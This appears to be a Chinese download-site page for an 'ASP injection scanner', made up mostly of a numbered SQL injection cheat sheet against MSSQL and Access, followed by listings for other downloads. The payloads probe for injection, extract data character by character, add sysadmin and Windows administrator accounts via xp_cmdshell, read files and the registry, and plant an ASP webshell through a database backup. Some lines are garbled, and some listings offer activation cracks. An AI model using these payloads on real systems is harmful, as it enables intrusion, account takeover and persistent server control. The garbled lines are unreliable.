标签: 网站安全检测入侵工具
本专用工具作用十分强劲,期待学生们用以正道,别去做一些为非作歹的让人十分可耻的事儿,由VB语言撰写的网址网站漏洞扫描专用工具的名字,ASP引入网站漏洞扫描专用工具,尤其在SQL Server引入检验层面有非常高的准确度。
1.分辨是不是有引入
;and 1=1
;and 1=2
2.分析判断是不是mssql
;and user0
3.分辨数据库系统软件
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4.引入主要参数是标识符
and [查询条件] and =
5.检索时没过虑主要参数的
and [查询条件] and %=
6.猜数据库
;and (Select Count(*) from [数据库名])0
7.猜字段
;and (Select Count(字段名) from 数据库名)0
8.猜字段中纪录长短
;and (select top 1 len(字段名) from 数据库名)0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0
10.检测管理权限构造(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.加上mssql和体系的账号
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)解析xml文件目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(上步获得的paths)))
(2)解析xml文件目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询资料的內容
13.mssql中的sql语句
xp_regenumvalues 注册表文件根键, 子键
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以好几个记录集方法回到全部键值
xp_regread 根键,子键,键值名
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir 回到制订键的值
xp_regwrite 根键,子键, 值名, 值种类, 值
值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello 载入注册表文件
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName 删掉某一值
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssql内嵌涵数
;and (select @@version)0 得到Windows的版本信息
;and user_name()=dbo 分辨当今系统软件的联接客户是否sa
;and (select user_name())0 爆当今系统软件的联接客户
;and (select db_name())0 获得当今联接的数据库
16.简约的webshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
要求的情况下,像这样子用:
l.asp?c=dir
加载全部内容
小米电脑助手 V1.1.0 官方最新版296.28M2320人在玩小米电脑助手官方版是一款功能强大的电脑管理软件,能够帮助用户更好的管理自己电脑,让小米电脑的设置管理更加便捷,提升大家的使用体验。
下载3dsMax场景安全工具 V2.1.0 官方版692K1950人在玩3dsMax场景安全工具是AutoDesk官方推出的安全杀毒工具,支持3ds Max2015-2020软件,能够保护软件免受CRP、ADSL、ALC和ALC2的恶意脚本的破坏。
下载ESET45MB1940人在玩ESET NOD32杀毒软件 v14.0 免费版(附激活工具),eset nod32是一款非常专业的面向全球用户的一款电脑系统安全杀毒软件。软件由ESET公司制作发行,ESET公司到目前为止已经由非常丰富的经验,ESET早在1992年就开始注重网络安全方面,至今以酱油超级多的追崇着
下载宏杰文件夹加密 V6.5.0.9 官方最新版5.34 MB1870人在玩宏杰文件夹加密官方最新版是一款专业的文件加密软件,宏杰文件夹加密不仅没有任何使用限制,而且该软件还支持用户自定义设置加密密码,并且可以瞬间就能完成加密与解密过程,满足用户的使用需求,有需要的朋友就来下载吧。
下载机顶盒一键root工具 V1.0 最新免费版379K1648人在玩机顶盒一键root工具是一款非常专业的电视机顶盒添加root小软件。如果想要对机顶盒刷机等操作,就可能需要先root,那么通过使用这款工具就能帮你轻松实现,支持各个品牌机顶盒,免费下载,欢迎体验。
下载傲盾DDoS防火墙 下载8.2MB1588人在玩此完全免费版本较大高并发线程数8000,防护40M每秒钟DDOS CC攻击 UDP攻击,无时间限制. 防护各种各样SYN DDOS攻击,残片攻击,UDP, ICMP,IGMP等flood攻击,空联接,SF各种各样系统漏洞攻击,DB系列产品系统漏洞攻击,CC,CC变异 ,代理商攻击,肉食鸡攻击
下载卡巴斯基2021下载17.6MB1556人在玩卡巴斯基2021通用激活工具 KRT Club V4 + 注册痕迹清除工具 无限试用版,KRT CLUB/注册痕迹清理工具是一个通用的卡巴斯基安全软件授权许可重置工具,是最新版卡巴斯基2020/2021的杀毒软件重复激活补丁,可无限试用,欢迎下载
下载USBCleaner下载170KB1542人在玩USBCleaner(U盘病毒专杀工具) V4.0 Build 20070126 官方绿色版 ,USBCleaner是针对U盘打造的一款辅助杀毒软件,该款U盘病毒专杀工具具有安全无毒的特点,大家可以放心使用
下载Word解密软件下载1.28MB1462人在玩okfone奥凯丰WORD解密大师 V2.0.6 官方安装版,专业的Word文件解密软件,这款软件支持迅速找回WORD密码,轻松解除不可编辑、打印以及签名等限制,本站提供的是这款软件的安装版本
下载pc tools firewall plus 下载9.7MB1450人在玩pc tools firewall plus最新版本是款十分实用的服务器防火墙运用,用这种系统能够解决许多病毒感染的攻击,能合理的避免木马病毒等不健康的病毒感染的侵入,使客户用电脑十分的安全性。有兴趣的朋友就来极光下载站吧!pc tools firewall plus手机软件功能1.掩藏您的PC,让
下载